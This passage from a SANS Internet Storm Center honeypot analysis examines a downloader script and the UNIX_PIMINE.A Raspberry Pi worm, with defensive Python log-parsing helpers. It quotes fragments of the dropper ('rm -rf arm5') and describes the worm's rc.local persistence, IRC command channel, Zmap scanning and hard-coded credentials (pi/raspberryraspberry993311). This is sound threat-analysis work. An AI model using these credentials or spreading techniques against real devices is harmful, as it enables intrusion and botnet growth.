This step changes the permissions of the downloaded payload to executable and then executes it with the argument ‘telnet’, which I’m guessing indicates the intended backdoor method.  Note that the script as received will attempt to execute all of the downloaded payloads, meaning that any environment discovery likely happens at this step, and only the payload corresponding to the compromised host’s chip architecture will successfully execute.

Line 4
rm -rf arm5

Finally, the payload is removed, possibly indicating that a persistence mechanism has been installed with the previous step, and more obviously indicating a desire to leave slightly fewer forensic artifacts on the target system.

Second-Stage Payload Server Analysis

The address 87.121.84.163 did not appear in any of the other uploaded files.  It appeared in several IP reputation blocklists as reported by Speedguide and Talos, though the referenced database at spamhaus.org did not return any immediately visible results.  At any rate, the RIPE records have the /24 netblock registered to an AS owned by a Dutch VPS provider, VPSVAULTHOST, which looks like it’s operating in the UK.  I’m assuming it’s a cloud-hosted server.  Interestingly, the ISC page has the country listed as Bulgaria, though I didn’t see anything else pointing there in my search.  Nothing else is reported on the ISC website.

Unfortunately, I have no other records of the source of this attack directly.  87.121.84.163 also did not appear in any other records, which is expected considering its role in the attack as a payload server.  In the next section, we will see instances of honeypot uploads with associated log entries, allowing for a more complete picture of an attack origin and life cycle.

Part 2: Botnet Worm Discovery

Continuing the investigation of patterns in uploaded files, I noticed that all of the file types identified by the system as ‘data’ appear to be readable text.  In the earlier bash script analysis, I noted that the file in question was not the only shell script present.  That is, it was not the only file containing a shebang (#!/bin/bash).  Moreover, file permissions that may have permitted identification of a shell script as such (i.e., 644 – readable by users other than root) were not unique to this file.  In fact, all of the ‘data’ files were not only readable but also consistently contained the string ‘bin/bash’.  In the following command, I filter for file types matching ‘data’ and containing ‘bin/bash’:


Note: Many of the files have no corresponding ‘metadata’ because the log records associated with these files have aged off of the system, but the files themselves have not.  Also, there are more total files in this screenshot because the timeline of this investigation was not perfectly linear.

In the previous screenshot we saw that our query for data files containing the bash interpreter path returned six matches.  Re-running the tool with no arguments, it appears that these six files account for 100% of our files of type ‘data’.  Looking at the other file types, the readability was either self-explanatory (ASCII, Unicode, shell script, empty) or inconsistent (some ‘regular files’ were binary while others were text-based).
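The content half of that filter can be approximated without the upload-stats tool. The Python sketch below only checks whether each file in a directory contains the byte string ‘bin/bash’; it does not reproduce the file-type detection or the log correlation that the tool performs, and the function names are made up for this example.

```python
from pathlib import Path


def mentions_bash(data: bytes) -> bool:
    """True if the raw file contents contain the interpreter path fragment."""
    return b"bin/bash" in data


def files_mentioning_bash(directory):
    """Return the names of regular files in directory that mention bin/bash."""
    hits = []
    for path in sorted(Path(directory).iterdir()):
        if path.is_file() and mentions_bash(path.read_bytes()):
            hits.append(path.name)
    return hits
```

On a honeypot this would be pointed at the downloads directory mentioned earlier, /srv/cowrie/var/lib/cowrie/downloads.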

The reason behind the variance in assigned permissions (either 0600 or 0644 for all files in the directory) has to do with the source of the activity from cowrie’s perspective.  A look at cowrie’s VFS (virtual file system) templates in fs.pickle would likely reveal the specifics of how these permissions are assigned, but for our purposes that’s not necessary at the moment.  To gain a general sense for the provenance of different file types on the system, we can start by examining the behavioral patterns associated with IPs that uploaded files of different types.  To set a baseline, I used another tool, ip-activity, to aggregate all of the log events associated with addresses that uploaded ‘regular’ files.  
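The aggregation step can be approximated in a few lines of Python.  This is a hedged sketch rather than the ip-activity tool: it assumes cowrie's JSON log format with one event per line and the fields src_ip, timestamp, and eventid, and the function name is hypothetical.

```python
import json
from collections import defaultdict


def activity_by_ip(log_lines, ips):
    """Group cowrie JSON events by source address for the given IPs.

    Returns {ip: [(timestamp, eventid), ...]} with each list sorted by time.
    Lines that are not valid JSON objects are skipped.
    """
    wanted = set(ips)
    timeline = defaultdict(list)
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if not isinstance(event, dict):
            continue
        src = event.get("src_ip")
        if src in wanted:
            timeline[src].append(
                (str(event.get("timestamp", "")), str(event.get("eventid", "")))
            )
    return {ip: sorted(events) for ip, events in timeline.items()}
```

Feeding it the lines of the cowrie.json files together with the list of uploader addresses yields a per-address timeline, which makes recurring sequences such as "login failures, login success, upload" easy to spot.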

Luckily not all of the logs related to these files have yet aged off.  This collection of data should reveal any consistencies in the context behind how these files were uploaded, which indeed it does.  For all files labeled as ‘regular’, the actor makes several login attempts, succeeds, and then uploads a file via SFTP.  With that knowledge, activity patterns related to ‘data’ files should stand out.

As hoped, this pattern is also consistent: files marked ‘data’ were written from stdin during an active SSH session.  That is, for these files the actor interacted with the system during an authenticated session before and/or after pushing a payload onto it, at least in the cases of 81.172.146.181 and 176.188.22.163.  Once verified, this type of information will be useful to include in the output of later versions of the upload-stats tool.

While looking over the activity for these two addresses, the login attempts caught my eye.  Both clients attempted pi/raspberry and pi/raspberryraspberry993311.  Both are clearly looking for Raspberry Pi devices, but raspberryraspberry993311 is a rather specific guess, considering that it was the second of only two guesses from two (to our current knowledge) independent hosts.  To me, that indicates this password is probably not a random guess from a brute-forcing attempt.
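The same observation can be turned into a simple hunt across the logs.  The sketch below is an illustration under assumptions, not part of the tooling used in this investigation: it assumes cowrie's JSON events cowrie.login.failed and cowrie.login.success with username, password, and src_ip fields, and it returns every source address that tried both credential pairs.

```python
import json
from collections import defaultdict

# The two credential pairs observed from both source addresses.
WORM_CREDENTIALS = frozenset({
    ("pi", "raspberry"),
    ("pi", "raspberryraspberry993311"),
})

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def ips_trying_all(log_lines, wanted=WORM_CREDENTIALS):
    """Return sorted source IPs that attempted every credential pair in `wanted`."""
    seen = defaultdict(set)
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if not isinstance(event, dict):
            continue
        if event.get("eventid") not in LOGIN_EVENTS:
            continue
        src = event.get("src_ip")
        pair = (event.get("username"), event.get("password"))
        if isinstance(src, str) and pair in wanted:
            seen[src].add(pair)
    return sorted(ip for ip, pairs in seen.items() if pairs == set(wanted))
```

Requiring both pairs, rather than either one, keeps generic brute-forcers that merely try pi/raspberry out of the result.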

A bit of research into ‘raspberryraspberry993311’ revealed a specific botnet malware strain targeting Raspberry Pi devices, identified as UNIX_PIMINE.A by Trend Micro.  The 2019 article linked below features a thorough analysis of the malware, which I will compare with the activity captured on my device.

https://www.researchgate.net/profile/Joakim-Kargaard-2/publication/334704944_Raspberry_Pi_Malware_An_Analysis_of_Cyberattacks_Towards_IoT_Devices/links/5e6f86ea458515e555803389/Raspberry-Pi-Malware-An-Analysis-of-Cyberattacks-Towards-IoT-Devices.pdf

To start, let’s compare the commands that followed successful authentication to the honeypot.  From my output, each command was saved to a separate tty logfile, so unfortunately the venerable playlog.py is not especially useful in this case.  However, we can still extract the command events directly from the logs, which I did.  For those not aware, playlog.py is a tool created by Upi Tamminen (desaster@dragonlight.fi) that parses cowrie TTY logs (saved in /srv/cowrie/var/lib/cowrie/tty/) and allows analysts to replay the activity in real time.

Both of our actors immediately pull a file to /tmp using scp, then set its permissions to executable and run it.  So far this is exactly aligned with the activity described in the UNIX_PIMINE.A article.  Next I will examine the files uploaded to see if they also follow the same path, where they may differ, and whether they appear to be members of the same botnet channel.


Screenshot from the researchgate.net article referenced above

Static Malware Analysis:  UNIX_PIMINE.A

Comparing the two samples uploaded by 81.172.146.181 and 176.188.22.163, the only difference between them is an scp control message prepended to the top of the files: C0755 4745 ocM8dVVu and C0755 4745 komDY9Nv, respectively.  To take the latter example, this control message breaks out to ‘copy file komDY9Nv of size 4745 with permissions 0755.’  As an aside, the presence of control messages at the top of the files uploaded from stdin likely explains why the ‘data’ files are not marked as shell scripts.  In addition, a null byte at the end of the files may explain why they are classified as ‘data’ rather than ASCII text.
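To make the framing concrete, here is a minimal Python sketch that parses a leading control message of the form ‘C&lt;mode&gt; &lt;size&gt; &lt;name&gt;’ and strips both it and a trailing null byte, leaving only the script body.  The function and class names are hypothetical, and the sketch handles only this single-file case; it does not verify that the declared size matches the body length.

```python
import re
from typing import NamedTuple, Optional


class ScpHeader(NamedTuple):
    mode: int   # permission bits, parsed from octal (e.g. 0o755)
    size: int   # declared payload size in bytes
    name: str   # file name sent by the client


# "C" + four octal digits, a space, decimal size, a space, name, newline.
_HEADER = re.compile(rb"^C([0-7]{4}) (\d+) ([^\n]+)\n")


def parse_scp_header(blob: bytes) -> Optional[ScpHeader]:
    """Parse a leading scp file control message, or return None if absent."""
    match = _HEADER.match(blob)
    if match is None:
        return None
    return ScpHeader(
        mode=int(match.group(1), 8),
        size=int(match.group(2)),
        name=match.group(3).decode("utf-8", "replace"),
    )


def strip_scp_framing(blob: bytes) -> bytes:
    """Remove the control line and one trailing NUL byte, if present."""
    match = _HEADER.match(blob)
    if match is None:
        return blob
    body = blob[match.end():]
    if body.endswith(b"\x00"):
        body = body[:-1]
    return body
```

With the framing removed, two samples that differ only in their control messages can be compared byte for byte or hashed to confirm they are the same script.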

Before continuing analysis of the scripts associated with just these two addresses, you may have noticed in the earlier enumeration of ‘data’ files that the sizes of the remaining files for which we lack log data appear to be identical.  Running vimdiff against the remaining files confirms that our other 4 data file records are instances of attacks from members of the same botnet.  Continuing down the code, everything appears to align with the description given in the referenced article.  The malware makes a copy of itself to a file with a random 8-character name within /opt, modifies /etc/rc.local to execute the backdoor on boot, and then reboots the system.

After that, the malware attempts to kill and remove a number of other (apparent) cryptomining plants that may already exist on the compromised system.  It then connects out to an Undernet Internet Relay Chat (IRC) server on port 6667, where it joins the #biret C2 channel with a username based on the md5 hash of the compromised system’s uname output.  As pointed out in the article, this is a fairly low-entropy generation scheme for unique usernames, since the probability of multiple systems with identical output for ‘uname -a’ is very high, leading to username collisions and ultimately limiting the worm’s growth factor.  I suspected channel rotation might have occurred since the article was published, but the instances that hit my machine were in fact from members of the same botnet from 2019.  Malware that endlessly replicates itself independently of its originator, as it turns out, is pretty hard to patch.
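The collision problem is easy to demonstrate.  The sketch below is illustrative only: the exact derivation used by the worm is not reproduced here, so the single-letter prefix, the truncation to the last eight hex characters, and the trailing newline are all assumptions, as are the function names and the sample uname strings.

```python
import hashlib
from collections import defaultdict


def irc_nick(uname_output, prefix="a", length=8):
    """Derive a nickname from the MD5 of a host's `uname -a` output.

    Assumed scheme: prefix + last `length` hex characters of the digest,
    hashing the output with a trailing newline as a shell pipe would.
    """
    digest = hashlib.md5((uname_output + "\n").encode("utf-8")).hexdigest()
    return prefix + digest[-length:]


def nick_collisions(hosts):
    """Map each nickname to the hosts that would share it.

    `hosts` is a dict of {host_label: uname_output}; only nicknames claimed
    by more than one host are returned.
    """
    by_nick = defaultdict(list)
    for label, uname_output in hosts.items():
        by_nick[irc_nick(uname_output)].append(label)
    return {nick: sorted(labels) for nick, labels in by_nick.items() if len(labels) > 1}
```

Because the nickname is a pure function of the uname string, any two devices with the same hostname, kernel build, and architecture map to the same nickname, regardless of how strong the hash is.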

The worm’s spreading mechanism involves the installation of sshpass for simplifying ssh-based connections to new targets and Zmap for port scanning.  Specifically, it scans IPs (iterating 100,000 addresses at a time) for port 22 availability and stores reachable addresses in a temporary file before trying its 2 credential sets: pi/raspberry and pi/raspberryraspberry993311.  The password ‘raspberry’ is a long-running default for Pi devices.  However, at this point it’s still not entirely clear why this second combination is used in particular; it is strongly correlated with various pi-related attacks, but does not seem to be a common default password as far as I have been able to discover.  It’s possible that some other malware variants (such as those this worm attempts to remove) create an account on compromised hosts with these credentials, leading to an increased likelihood of successful authentication for the types of devices this worm looks to infect.

Source Address Consideration: Compromised Pies

Knowing what we do about the way this malware spreads, the session activity is pretty clear.  It’s best to think of the actor addresses in this case as two compromised victims of the same worm; i.e., members of the same botnet.  From the two sets of logs we have at hand, 81.172.146.181 appears to be a Dutch ISP-assigned public address within a network belonging to DELTA Fiber Nederland B.V.  My guess would be that this is a network/IoT appliance or possibly a Raspberry Pi positioned behind a SOHO gateway router with port forwarding, based on what we’ve seen so far.  176.188.22.163 is a similar story: in this case, the address belongs to a French ISP (Bouygues Telecom).  No malicious activity has been reported for either address on the ISC website.

Conclusion: File Uploads and Attack Descriptions

Correlation of event logs to files uploaded to the honeypot has proved effective for discovering highly specific attack patterns.  Moreover, context surrounding the operating internals of the cowrie (or other honeypot) environment is crucial for understanding the chronology and substance of an event.  Automating processes such as event correlation and the ability to group files, IPs, and other information into discrete buckets greatly reduces the overhead required for such investigations and encourages analytic insights.  A disadvantage of this approach is its narrow scope: activity that results in a file upload is a very small share of the total volume of logged events, though depending on the intent of an investigation, this may not be a problem.

The attacks observed in this article highlight the need primarily for maintenance and monitoring of legacy systems, as well as the necessity of changing default passwords before exposing systems to the public Internet.

[1] https://github.com/neurohypophysis/dshield-tooling
[2] https://github.com/DShield-ISC/dshield/tree/main
[3] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.